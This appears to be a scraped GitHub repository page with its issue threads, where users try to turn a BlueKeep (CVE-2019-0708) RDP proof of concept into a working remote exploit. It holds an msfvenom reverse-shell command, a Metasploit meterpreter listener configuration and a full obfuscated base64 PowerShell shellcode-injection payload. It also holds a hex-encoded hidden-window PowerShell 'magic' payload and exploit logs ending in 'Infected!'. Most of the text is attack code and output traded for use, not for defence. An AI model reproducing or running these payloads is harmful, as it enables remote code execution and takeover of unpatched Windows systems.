An Attempt to Port BlueKeep PoC from @Ekultek to actual exploits
License: GNU General Public License v3.0
🌱 I’m currently learning: Go
⚡ Fun fact: I am addicted to iced tea
GitHub Contribution Ranking - Switzerland
GitHub Contribution Ranking - Taiwan
Do you have any working shellcode to share?
simple code should be fine such as opening the cmd or notepad on the target server
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.3 lport=19527 -f c
python unicorn.py 1.txt shellcode
Conversion to hexadecimal
Test modified poc.py
[ �[32m+�[0m ] verifying RDP service on: 192.168.1.150
[ �[32m+�[0m ] successfully connected to RDP service on host: 192.168.1.150
[ �[32m+�[0m ] starting RDP connection on 1 targets
[ �[32m+�[0m ] sending Client MCS Connect Initial PDU request packet -->
[ �[32m+�[0m ] <-- received 0x70 bytes from host: 192.168.1.150
[ �[32m+�[0m ] sending Client MCS Domain Request PDU packet -->
[ �[32m+�[0m ] sending Client MCS Attach User PDU request packet -->
[ �[32m+�[0m ] <-- received 0xb bytes from host: 192.168.1.150
[ �[32m+�[0m ] sending MCS Channel Join Request PDU packets -->
[ �[32m+�[0m ] <-- received 0xf bytes from channel 1001 on host: 192.168.1.150
[ �[32m+�[0m ] <-- received 0xf bytes from channel 1002 on host: 192.168.1.150
[ �[32m+�[0m ] <-- received 0xf bytes from channel 1003 on host: 192.168.1.150
[ �[32m+�[0m ] <-- received 0xf bytes from channel 1004 on host: 192.168.1.150
[ �[32m+�[0m ] <-- received 0xf bytes from channel 1005 on host: 192.168.1.150
[ �[32m+�[0m ] <-- received 0xf bytes from channel 1006 on host: 192.168.1.150
[ �[32m+�[0m ] <-- received 0xf bytes from channel 1007 on host: 192.168.1.150
[ �[32m+�[0m ] sending Client Security Exhcange PDU packets -->
[ �[32m+�[0m ] <-- received 0x22 bytes from host: 192.168.1.150
[ �[32m+�[0m ] sending Client Confirm Active PDU packet -->
[ �[32m+�[0m ] <-- received 0x1b9 bytes from host: 192.168.1.150
[ �[32m+�[0m ] sending Client Synchronization PDU packet -->
[ �[32m+�[0m ] sending Client Control Cooperate PDU packet -->
[ �[32m+�[0m ] sending Client Control Requesr PDU packet -->
[ �[32m+�[0m ] sending Client Persistent Key Length PDU packet -->
[ �[31m!�[0m ] unable to connect: (10054, 'WSAECONNRESET')
As Ekultek write in his twitter
"\x03\x00\x00\x0c\x02\xf0\x808\x00\x06MS_T120\x00\x00\x00\x00AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Adding payloads isn’t very hard. You have to make the payload though mine won’t be shared. All you have to do is find the correct spot, tls.sendall(“payloadhex”)"
first shit is \x03\x00\x00\x0c\x02\xf0\x808\x00\x06 i think its 0300000c02f080380006
as in "dep": "0300000c02f080380006",
next shit MS_T120 - its 4d535f5431323000000000
so first part must be 0300000c02f0803800064d535f5431323000000000YOURSHELL
but next payload part i cant find, maybe someone will do it :)
script still make auth error in rdp
ce n'est pas l'éthique d'un vrai hacker tu fais trop le pro et tu n'es pas aussi gentil que le sien
Mec, je ne sais pas de quoi tu parles.
nous vous demandons l'exploit complet pourquoi vous ne voulez pas partager? ne fais pas semblant de ne pas comprendre
Mec, je ne sais pas de quoi tu parles. Je n'en suis pas l'auteur. Je viens du bifurquer des personnes que j'ai marquées dans le README et j'ai travaillé avec lui à ma manière. Ce n'est pas mon obligation de développer une solution de travail. Je ne l'ai pas fait fonctionner parce que je ne savais pas de commentaire. Je ne fais toujours pas parce que j'ai d'autres projets et d'autres choses dans la vie sur moi me concentrer. Ce n'est pas que j'obtiendrai un premier million de dollars si je réussis. Je ne faisais cela que par intérêt. Depuis quand Github est devenu si toxique aussi lol.
non je ne vous demande rien moi juste j'ai lu vos commentaires et ça m'a fait rire
why are you talking to me omg
you suck your tooth bad you take the defense of all git hub?
Originally posted by @kiki-sasa in #21 (comment)
1.windows logs--system:get 2 error about termdd:
first error information:The RDP protocol component WD detected an error in the protocol stream and has disconnected the client.
second error information:The Terminal Server security layer detected an error in the protocol stream and has disconnected the client. Client IP: 192.168.56.102.
2.applications and services logs -- Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational
log information detail:
Remote Desktop Services: User authentication succeeded:
User: BrwAffy
Domain:
Source Network Address: 192.168.56.102
3.applications and services logs --Microsoft-Windows-TerminalServices-LocalSessionManager/Operational
log information detail:
Attempt to send connect message to Windows video subsystem failed. The relevant status code was 0xd0000001.
FIY.
python unicorn.py windows/x64/meterpreter/reverse_tcp 192.168.123.182 8888
[*] Generating the payload shellcode.. This could take a few seconds/minutes as we create the shellcode...
,/
//
,//
___ /| |//
`__/\_ --(/|___/-/
\|\_-\___ __-_`- /-/ \.
|\_-___,-\_____--/_)' ) \
\ -_ / __ \( `( __`\|
`\__| |\)\ ) /(/|
,._____., ',--//-| \ | ' /
/ __. \, / /,---| \ /
/ / _. \ \ `/`_/ _,' | |
| | ( ( \ | ,/\'__/'/ | |
| \ \`--, `_/_------______/ \( )/
| | \ \_. \, \___/\
| | \_ \ \ \
\ \ \_ \ \ / \
\ \ \._ \__ \_| | \
\ \___ \ \ | \
\__ \__ \ \_ | \ |
| \_____ \ ____ | |
| \ \__ ---' .__\ | | |
\ \__ --- / ) | \ /
\ \____/ / ()( \ `---_ /|
\__________/(,--__ \_________. | ./ |
| \ \ `---_\--, \ \_,./ |
| \ \_ ` \ /`---_______-\ \\ /
\ \.___,`| / \ \\ \
\ | \_ \| \ ( |: |
\ \ \ | / / | ;
\ \ \ \ ( `_' \ |
\. \ \. \ `__/ | |
\ \ \. \ | |
\ \ \ \ ( )
\ | \ | | |
| \ \ \ I `
( __; ( _; ('-_';
|___\ \___: \___:
aHR0cHM6Ly93d3cuYmluYXJ5ZGVmZW5zZS5jb20vd3AtY29udGVudC91cGxvYWRzLzIwMTcvMDUvS2VlcE1hdHRIYXBweS5qcGc=
Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)
Twitter: @trustedsec, @HackingDave
Happy Magic Unicorns.
[!] WARNING. WARNING. Length of the payload is above command line limit length of 8191. Recommend trying to generate again or the line will be cut off.
[!] Total Payload Length Size: 8420
Press {return} to continue.
[********************************************************************************************************]
-----POWERSHELL ATTACK INSTRUCTIONS----
Everything is now generated in two files, powershell_attack.txt and unicorn.rc. The text file contains all of the code needed in order to inject the powershell attack into memory. Note you will need a place that supports remote command injection of some sort. Often times this could be through an excel/word doc or through psexec_commands inside of Metasploit, SQLi, etc.. There are so many implications and scenarios to where you can use this attack at. Simply paste the powershell_attack.txt command in any command prompt window or where you have the ability to call the powershell executable and it will give a shell back to you. This attack also supports windows/download_exec for a payload method instead of just Meterpreter payloads. When using the download and exec, simply put python unicorn.py windows/download_exec url=https://www.thisisnotarealsite.com/payload.exe and the powershell code will download the payload and execute.
Note that you will need to have a listener enabled in order to capture the attack.
[*******************************************************************************************************]
[] Exported powershell output code to powershell_attack.txt.
[] Exported Metasploit RC file as unicorn.rc. Run msfconsole -r unicorn.rc to execute and create listener.
union.rc file
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.123.182
set LPORT 8888
set ExitOnSession false
set AutoVerifySession false
set AutoSystemInfo false
set AutoLoadStdapi false
exploit -j
powershell_attack.txt file
powershell /w 1 /C "s''v jR -;s''v us e''c;s''v fB ((g''v jR).value.toString()+(g''v us).value.toString());powershell (g''v fB).value.toString() ('JABrAHkAPQAnACQAZwB3AD0AJwAnAFsAWABqAFgAKAAoACIAbQBzAHYAYwByAHQAIgArACIALgAiACsAIgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAdABTAE0AKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBYAGoAWAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZAAiACsAIgBsACIAKwAiAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIAB2AG0AcAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsAWABqAFgAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAIgArACIAbAAiACsAIgBsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIABnAFUAeQApADsAWwBYAGoAWAAoACIAbQBzAHYAYwByAHQAIgArACIALgAiACsAIgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAZwB3AD0AJABnAHcALgByAGUAcABsAGEAYwBlACgAIgB2AG0AcAAiACwAIAAiAEMAcgBlAGEAdABlAFQAIgArACIAaAAiACsAIgByAGUAYQBkACIAKQA7ACQAZwB3AD0AJABnAHcALgByAGUAcABsAGEAYwBlACgAIgB0AFMATQAiACwAIAAiAGMAYQAiACsAIgBsACIAKwAiAGwAbwBjACIAKQA7ACQAZwB3AD0AJABnAHcALgByAGUAcABsAGEAYwBlACgAIgBYAGoAWAAiACwAIAAiAEQAbABsAEkAbQBwAG8AcgAiACsAIgB0ACIAKwAiACIAKQA7ACQASABRAD0AIgB9AGYAYwAsAH0ANAA4ACwAfQA4ADMALAB9AGUANAAsAH0AZgAwACwAfQBlADgALAB9AGMAYwAsAH0AMAAwACwAfQAwADAALAB9ADAAMAAsAH0ANAAxACwAfQA1ADEALAB9ADQAMQAsAH0ANQAwACwAfQA1ADIALAB9ADUAMQAsAH0ANQA2ACwAfQA0ADgALAB9ADMAMQAsAH0AZAAyACwAfQA2ADUALAB9ADQAOAAsAH0AOABiACwAfQA1ADIALAB9ADYAMAAsAH0ANAA4ACwAfQA4AGIALAB9ADUAMgAsAH0AMQA4ACwAfQA0ADgALAB9ADgAYgAsAH0ANQAyACwAfQAyADAALAB9ADQAOAAsAH0AOABiACwAfQA3ADIALAB9ADUAMAAsAH0ANAA4ACwAfQAwAGYALAB9AGIANwAsAH0ANABhACwAfQA0AGEALAB9ADQAZAAsAH0AMwAxACwAfQBjADkALAB9ADQAOAAsAH0AMwAxACwAfQBjADAALAB9AGEAYwAsAH0AMwBjACwAfQA2ADEALAB9ADcAYwAsAH0AMAAyACwAfQAyAGMALAB9ADIAMAAsAH0ANAAxACwAfQBjADEALAB9AGMAOQAsAH0AMABkACwAfQA0ADEALAB9ADAAMQAsAH0AYwAxACwAfQBlADIALAB9AGUAZAAsAH0ANQAyACwAfQA0ADEALAB9ADUAMQAsAH0ANAA4ACwAfQA4AGIALAB9ADUAMgAsAH0AMgAwACwAfQA4AGIALAB9ADQAMgAsAH0AMwBjACwAfQA0ADgALAB9ADAAMQAsAH0AZAAwACwAfQA2ADYALAB9ADgAMQAsAH0ANwA4ACwAfQAxADgALAB9ADAAYgAsAH0AMAAyACwAfQAwAGYALAB9ADgANQAsAH0ANwAyACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQA4AGIALAB9ADgAMAAsAH0AOAA4ACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQA0ADgALAB9ADgANQAsAH0AYwAwACwAfQA3ADQALAB9ADYANwAsAH0ANAA4ACwAfQAwADEALAB9AGQAMAAsAH0ANQAwACwAfQA4AGIALAB9ADQAOAAsAH0AMQA4ACwAfQA0ADQALAB9ADgAYgAsAH0ANAAwACwAfQAyADAALAB9ADQAOQAsAH0AMAAxACwAfQBkADAALAB9AGUAMwAsAH0ANQA2ACwAfQA0ADgALAB9AGYAZgAsAH0AYwA5ACwAfQA0ADEALAB9ADgAYgAsAH0AMwA0ACwAfQA4ADgALAB9ADQAOAAsAH0AMAAxACwAfQBkADYALAB9ADQAZAAsAH0AMwAxACwAfQBjADkALAB9ADQAOAAsAH0AMwAxACwAfQBjADAALAB9AGEAYwAsAH0ANAAxACwAfQBjADEALAB9AGMAOQAsAH0AMABkACwAfQA0ADEALAB9ADAAMQAsAH0AYwAxACwAfQAzADgALAB9AGUAMAAsAH0ANwA1ACwAfQBmADEALAB9ADQAYwAsAH0AMAAzACwAfQA0AGMALAB9ADIANAAsAH0AMAA4ACwAfQA0ADUALAB9ADMAOQAsAH0AZAAxACwAfQA3ADUALAB9AGQAOAAsAH0ANQA4ACwAfQA0ADQALAB9ADgAYgAsAH0ANAAwACwAfQAyADQALAB9ADQAOQAsAH0AMAAxACwAfQBkADAALAB9ADYANgAsAH0ANAAxACwAfQA4AGIALAB9ADAAYwAsAH0ANAA4ACwAfQA0ADQALAB9ADgAYgAsAH0ANAAwACwAfQAxAGMALAB9ADQAOQAsAH0AMAAxACwAfQBkADAALAB9ADQAMQAsAH0AOABiACwAfQAwADQALAB9ADgAOAAsAH0ANAA4ACwAfQAwADEALAB9AGQAMAAsAH0ANAAxACwAfQA1ADgALAB9ADQAMQAsAH0ANQA4ACwAfQA1AGUALAB9ADUAOQAsAH0ANQBhACwAfQA0ADEALAB9ADUAOAAsAH0ANAAxACwAfQA1ADkALAB9ADQAMQAsAH0ANQBhACwAfQA0ADgALAB9ADgAMwAsAH0AZQBjACwAfQAyADAALAB9ADQAMQAsAH0ANQAyACwAfQBmAGYALAB9AGUAMAAsAH0ANQA4ACwAfQA0ADEALAB9ADUAOQAsAH0ANQBhACwAfQA0ADgALAB9ADgAYgAsAH0AMQAyACwAfQBlADkALAB9ADQAYgAsAH0AZgBmACwAfQBmAGYALAB9AGYAZgAsAH0ANQBkACwAfQA0ADkALAB9AGIAZQAsAH0ANwA3ACwAfQA3ADMALAB9ADMAMgAsAH0ANQBmACwAfQAzADMALAB9ADMAMgAsAH0AMAAwACwAfQAwADAALAB9ADQAMQAsAH0ANQA2ACwAf'+'QA0ADkALAB9ADgAOQAsAH0AZQA2ACwAfQA0ADgALAB9ADgAMQAsAH0AZQBjACwAfQBhADAALAB9ADAAMQAsAH0AMAAwACwAfQAwADAALAB9ADQAOQAsAH0AOAA5ACwAfQBlADUALAB9ADQAOQAsAH0AYgBjACwAfQAwADIALAB9ADAAMAAsAH0AMgAyACwAfQBiADgALAB9ADgAYgAsAH0AOQBiACwAfQA3ADYALAB9AGYANwAsAH0ANAAxACwAfQA1ADQALAB9ADQAOQAsAH0AOAA5ACwAfQBlADQALAB9ADQAYwAsAH0AOAA5ACwAfQBmADEALAB9ADQAMQAsAH0AYgBhACwAfQA0AGMALAB9ADcANwAsAH0AMgA2ACwAfQAwADcALAB9AGYAZgAsAH0AZAA1ACwAfQA0AGMALAB9ADgAOQAsAH0AZQBhACwAfQA2ADgALAB9ADAAMQAsAH0AMAAxACwAfQAwADAALAB9ADAAMAAsAH0ANQA5ACwAfQA0ADEALAB9AGIAYQAsAH0AMgA5ACwAfQA4ADAALAB9ADYAYgAsAH0AMAAwACwAfQBmAGYALAB9AGQANQAsAH0ANgBhACwAfQAwAGEALAB9ADQAMQAsAH0ANQBlACwAfQA1ADAALAB9ADUAMAAsAH0ANABkACwAfQAzADEALAB9AGMAOQAsAH0ANABkACwAfQAzADEALAB9AGMAMAAsAH0ANAA4ACwAfQBmAGYALAB9AGMAMAAsAH0ANAA4ACwAfQA4ADkALAB9AGMAMgAsAH0ANAA4ACwAfQBmAGYALAB9AGMAMAAsAH0ANAA4ACwAfQA4ADkALAB9AGMAMQAsAH0ANAAxACwAfQBiAGEALAB9AGUAYQAsAH0AMABmACwAfQBkAGYALAB9AGUAMAAsAH0AZgBmACwAfQBkADUALAB9ADQAOAAsAH0AOAA5ACwAfQBjADcALAB9ADYAYQAsAH0AMQAwACwAfQA0ADEALAB9ADUAOAAsAH0ANABjACwAfQA4ADkALAB9AGUAMgAsAH0ANAA4ACwAfQA4ADkALAB9AGYAOQAsAH0ANAAxACwAfQBiAGEALAB9ADkAOQAsAH0AYQA1ACwAfQA3ADQALAB9ADYAMQAsAH0AZgBmACwAfQBkADUALAB9ADgANQAsAH0AYwAwACwAfQA3ADQALAB9ADAAYwAsAH0ANAA5ACwAfQBmAGYALAB9AGMAZQAsAH0ANwA1ACwAfQBlADUALAB9ADYAOAAsAH0AZgAwACwAfQBiADUALAB9AGEAMgAsAH0ANQA2ACwAfQBmAGYALAB9AGQANQAsAH0ANAA4ACwAfQA4ADMALAB9AGUAYwAsAH0AMQAwACwAfQA0ADgALAB9ADgAOQAsAH0AZQAyACwAfQA0AGQALAB9ADMAMQAsAH0AYwA5ACwAfQA2AGEALAB9ADAANAAsAH0ANAAxACwAfQA1ADgALAB9ADQAOAAsAH0AOAA5ACwAfQBmADkALAB9ADQAMQAsAH0AYgBhACwAfQAwADIALAB9AGQAOQAsAH0AYwA4ACwAfQA1AGYALAB9AGYAZgAsAH0AZAA1ACwAfQA0ADgALAB9ADgAMwAsAH0AYwA0ACwAfQAyADAALAB9ADUAZQAsAH0AOAA5ACwAfQBmADYALAB9ADYAYQAsAH0ANAAwACwAfQA0ADEALAB9ADUAOQAsAH0ANgA4ACwAfQAwADAALAB9ADEAMAAsAH0AMAAwACwAfQAwADAALAB9ADQAMQAsAH0ANQA4ACwAfQA0ADgALAB9ADgAOQAsAH0AZgAyACwAfQA0ADgALAB9ADMAMQAsAH0AYwA5ACwAfQA0ADEALAB9AGIAYQAsAH0ANQA4ACwAfQBhADQALAB9ADUAMwAsAH0AZQA1ACwAfQBmAGYALAB9AGQANQAsAH0ANAA4ACwAfQA4ADkALAB9AGMAMwAsAH0ANAA5ACwAfQA4ADkALAB9AGMANwAsAH0ANABkACwAfQAzADEALAB9AGMAOQAsAH0ANAA5ACwAfQA4ADkALAB9AGYAMAAsAH0ANAA4ACwAfQA4ADkALAB9AGQAYQAsAH0ANAA4ACwAfQA4ADkALAB9AGYAOQAsAH0ANAAxACwAfQBiAGEALAB9ADAAMgAsAH0AZAA5ACwAfQBjADgALAB9ADUAZgAsAH0AZgBmACwAfQBkADUALAB9ADQAOAAsAH0AMAAxACwAfQBjADMALAB9ADQAOAAsAH0AMgA5ACwAfQBjADYALAB9ADQAOAAsAH0AOAA1ACwAfQBmADYALAB9ADcANQAsAH0AZQAxACwAfQA0ADEALAB9AGYAZgAsAH0AZQA3ACIAOwAkAEIAbQA9AEEAZABkAC0AVAB5AHAAZQAgAC0AcABhAHMAcwAgAC0AbQAgACQAZwB3ACAALQBOAGEAbQBlACAAIgBFAFQAIgAgAC0AbgBhAG0AZQBzACAAVQBxAE0AOwAkAEIAbQA9ACQAQgBtAC4AcgBlAHAAbABhAGMAZQAoACIAVQBxAE0AIgAsACAAIgBXACIAKwAiAGkAIgArACIAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIgApADsAWwBiAHkAdABlAFsAXQBdACQASABRACAAPQAgACQASABRAC4AcgBlAHAAbABhAGMAZQAoACIAfQAiACwAIgBQAEgAegBMAHgAIgApAC4AcgBlAHAAbABhAGMAZQAoACIAUABIAHoATAAiACwAIAAiADAAIgApAC4AUwBwAGwAaQB0ACgAIgAsACIAKQA7ACQAVgBvAD0AMAB4ADEAMAAxADAAOwBpAGYAIAAoACQASABRAC4ATAAgAC0AZwB0ACAAMAB4ADEAMAAxADAAKQB7ACQAVgBvAD0AJABIAFEALgBMAH0AOwAkAG4AdQA9ACQAQgBtADoAOgBjAGEAbABsAG8AYwAoADAAeAAxADAAMQAwACwAIAAxACkAOwBbAFUASQBuAHQANgA0AF0AJABnAFUAeQAgAD0AIAAwADsAZgBvAHIAKAAkAFcAUQA9ADAAOwAkAFcAUQAgAC0AbABlACgAJABIAFEALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAVwBRACsAKwApAHsAJABCAG0AOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABuAHUALgBUAG8ASQBuAHQAMwAyACgAKQArACQAVwBRACkALAAgACQASABRAFsAJABXAFEAXQAsACAAMQApAH0AOwAkAEIAbQA6ADoAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgAJABuAHUALAAgADAAeAAxADAAMQAwACwAIAAwAHgANAAwACwAIABbAFIAZQBmAF0AJABnAFUAeQApADsAJABCAG0AOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAAeAAwADAALAAkAG4AdQAsADAALAAwACwAMAApADsAJwA7ACQAYQBVAD0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABrAHkAKQApADsAJABHAEkAPQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7ACQAQwB3AD0AIgBXAGkAbgBkAG8AdwBzACIAOwAkAGoAZQBTACAAPQAgACIAQwA6AFwAJABDAHcAXABzAHkAcwB3AG8AdwA2ADQAXAAkAEMAdwAkAEcASQBcAHYAMQAuADAAXAAkAEcASQAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAEcASQA9ACAAJABqAGUAUwB9ADsAJABpAGMAIAA9ACAAIgAgACQARwBJACAALQBuAG8AZQB4AGkAdAAgAC0AZQAgACQAYQBVACIAOwBpAGUAeAAgACQAaQBjAA'+'==')"
i change the byte into the magic ,but nothing happend in my vlun machine
can you tell me how you generate your payload
thanks
[ + ] <socket.socket fd=3, family=AddressFamily.AF_INET, type=SocketKind.SOCK_STREAM, proto=0, laddr=('192.168.137.1', 64251), raddr=('192.168.137.201', 3389)>
laddr=('192.168.137.1', 64251)
port 64251 is random generate,How it can reverse shell ?
of printing the supposed socket that shows 'success' ....
Hi, I am having this issue, on my Ubuntu 18.10 x64 when i am trying your code
root@test:~/bluekeep_CVE-2019-0708_poc_to_exploit# python3 poc.py -i 192.168.0.15
Traceback (most recent call last):
File "poc.py", line 6, in
from impacket.structure import Structure
ModuleNotFoundError: No module named 'impacket'
How can i fix this? I've installed impacket, for python 2.76 but i haven't been able to do it on python 3.6.8
https://github.com/Ekultek/BlueKeep/blob/master/bluekeep_poc.py
said:
Generating the payloads is hard, especially when alsr is involved with it.
but you just send a hex powershell command.
Is Ekultek just make fun of us?
please tell me how to modify the content of method 'client_active_confirmation_pdu', I found it is different from the method in bluekeep_poc.py. maybe is it the key to the problem
win7 sp1 x64
[ + ] sending Client Security Exhcange PDU packets -->
[ + ] <-- received 0x22 bytes from host: 192.168.137.201
[ + ] sending Client Confirm Active PDU packet -->
[ + ] <-- received 0x1b9 bytes from host: 192.168.137.201 [ + ] sending Client Synchronization PDU packet -->
[ + ] sending Client Control Cooperate PDU packet -->
[ + ] sending Client Control Requesr PDU packet -->
[ + ] sending Client Persistent Key Length PDU packet --> [ + ] sending Client Font List PDU packet -->
[ + ] sending shell code --->
[ + ] Infected!
[ + ] 192.168.137.201
[ + ] <socket.socket fd=3, family=AddressFamily.AF_INET, type=SocketKind.SOCK_STREAM, proto=0, laddr=('192.168.137.1', 64251), raddr=('192.168.137.201', 3389)>
magic = ("706f7765727368656c6c202d6e6f70202d772068696464656e202d656e636f646564636f6d6d616e64204a41427a414430415467426c414863414c514250414749416167426c41474d416441416741456b4154774175414530415a514274414738416367423541464d41644142794147554159514274414367414c41426241454d4162774275414859415a514279414851415851413641446f41526742794147384162514243414745416377426c414459414e4142544148514163674270414734415a77416f414349415341413041484d415351424241454541515142424145454151514242414545415151424f4144454156774268414663414c77426941464d415167424d41446b4159674251414441415377423441485141515142704144414163774252414459415441426b414730416541426e4148634151674277414667416241424a41486f416277427041486b4153774273414451414e7742344145774153414270414441416351424b41466f414e41424541475141625141774148414151514255414455414e774135414530414f414279414549416177427341485541656742514145454165674249414455415951424241477341595142794144494162414258414859414e674273414659415741426b41466f415a51424c41464d415251427a41477741517742594147454153514249414577416251424a41474541556742724147384155774259414555415651424e414859414d514268414849415751413241486341575142354146674154514253414373415967423041466b416467427141444141576742324147454164674255414449415177417941456741646742334144674156774235414449415277426e414467415967427a414777414b77425a41446b4165414236414667416467423241446b415651424741486b415351424741445541557741354146674151514273414545415a414236414859415a7742584147304152774271414651415a774259414559415a41426941473041635142434148454154414253414559415477426f414551415a67417841446741596742324148674156414179414467416341424a414549414f5142434146454164674246414373416467426841444d41566742794146514155674247414763415a5141794147594159774232414563414e67426b4148414156774273414538415541425241466b414f51426141464541557742474145674165514130414559415467423241486f4154414244414645414e414252414563414d41425a4145554163414253414555416377425a4148454155774247414373416551426e4147774153774278414559415667427641455141557741794145674153514252414763414f41424e414751415977426e41476f41656742304146674157674178414559415677426c414449416167423441444d4152774134414745416177424d41466f41634142504145594156414279414559414e774230414649415767413541486b414d414231414759416251426c414849415a67424c4145304164774244414549416467426f414373414e51424741476b41525141344148514156674250414530415677424c41437341545142734148634156514243414551415a77425141484d415741423241484d415a414269414859415a414248414449415951425041465541645142764145384152674255414851414f51423141484d4154674134414373414d67413541466b415451426e4148454161514131414551415567424d41456b416177424a4145514165514255414641414e414273414649415277425041486b415451427241456b4162514270414641415441424f414649415467424e41464d41634142554145494162674179414549416277427341454d415967423641486b415277425241445141634142474146454157514248414563414e5142334143734152774276414730415667427341446b41624142364146414163774172414551415477424a414738415351425a41444d416367425141465541634142444144554154674176414449414d674132414463416467425941486f415a6742514147634151774274414767416541424441476f416451427241464d4157514230414841415267426f414773415567426f4145774152774233414545416267424b4145774154414176414763414d77426841476f414d6741764145494161514130414749416277424d41464d414f51424c41466f414d414133414549414e5142564143384151514257414659416477427a414745414c7742364145344152674131414855416551424d414745414c7742514145494155414233414855415251425441466f4151674248414773415967426c4147344161514176414767414e514250414573415551424f41454d416351413541457341625141324147594164414245414667415451425341486b414f51427441465941647742614144494156774132414777414e51424241486f415a77426d414641414d6742364145554163414276414749415667424341475941576741724146414151774247414449415667425341484141554141774146414162514278414655414d774132414641414e51424f41456f416167427441445141595142584145554161514253414738416241424c414745414f514261414567415641417a41466f415a514270414745414f51427a414851416251424e414849415a414249414441415951426a41456741527741774144634161774249414563416467427641446b4156414131414555415577426f414730416541425a414755414e674259414559414b774278414445414d514176414738416377417a4147674155674246414563415451426d41466f415551417a41444d41516742524147514156774270414655415477424a414449415451427541476b415a41424b4147384155514135414845415977423141484941567742544148554152674276414451414d67427841486f414d414244414559414e67423341476b414e51424b414745415541426a4144634157674277414841415a514248414659415a674251414773416151427541486b415651427941486b4157414132414373415977426a4144554155514172414730416367426d4146674164514250414534416151426f414549416277425a414534415977425641456741575142754146494162514274414749414e51427541466f416451426f414649414e514278414759415277427741474d4156674131414767414e514251414730414e67425a41446b41557742334148514157414255414449414d77424c4143384156674255414755414d51424c4146594155774279414534414e514243414767414d67426f41455541517742594144414162414248414559415751426b414763416151424f41484d41635141304147774152774268414849415667413241466f4152674273414759416441413141484d41576741724148454164674233414749414d77427041476b4156514272414655416351424741456341567742504145734161414253414863415a414177414863414e51413141485541616742584147454164514230414449415567424f414549414e67417241475941626741724147384164514257414338415467423241456f414e7741324143734155414236414641416341424e41464141534142344145494151774259414777414b77426d41453041654142534146634151774230414559415a414130414641414f414276414763416451413541486741626742574145674164774251414867416477423441477341597742754146454152414135414549416267424441484d4152774278414373416367424841454d4163774278414855414e51424c41485541555142784145554163774243414651414c774255414851415267423141456b415a5141354145734161414134414441415a77425741485941556742794148494165414261414441414d41426941464d4165514276414338415167426e414777414c77417a414563414e4142424146514153774246414863415767427241446b41537742714148634157414250414563415467413441474941525142784148594163674178414545414e514236414555414d67425741444d416141424e4145494162414242414449414c77426f4145774159674274414551414d51424941453841615142454145384152414244414559416541425a414641414e41417a414730416277426e4148494152774270414645416477424b414567415a77427141484141556742504145594157514244414577416367413441486f414f5142794148594154774254414649414f51424f414841416267424341457741596742574147514156414179414759415277426f4144634153414244414841414e4142764148634162414259414767415a67425a414763414e77426941486f414d77424a414441416277426e414373414e51426f41486f4164774275414459416377424d414851415751424d414530414d77424441475941615141334147774164674277414649416241424c414845416451413141486f415167413141486f416251426a414655415341424741475541576741724145594152774251414577416251423141456f4164774261414755414e774247414841415677424d414451416367424d4147344153414176414551414d77424941484d416467427741457741654142364145304152674272414755414e77427141476b41576742454144554163774233414463414f5142474147304157514246414659415341423041445141595141314147344152414179414545414e67424e41457741637741794145344163514254414463415241425241456b415541426f414655415967424741476f414d6742554144414164414234414455414d41424941454541654142684148674164514253414573415467427241474d414d77427141466f41534142574145494156674243414645414e77423141476f415541424441456b415477423341446741544142434145734162674247414441415541427a41476b4152774233414730415177425341484d415151424c414767414d51426b4147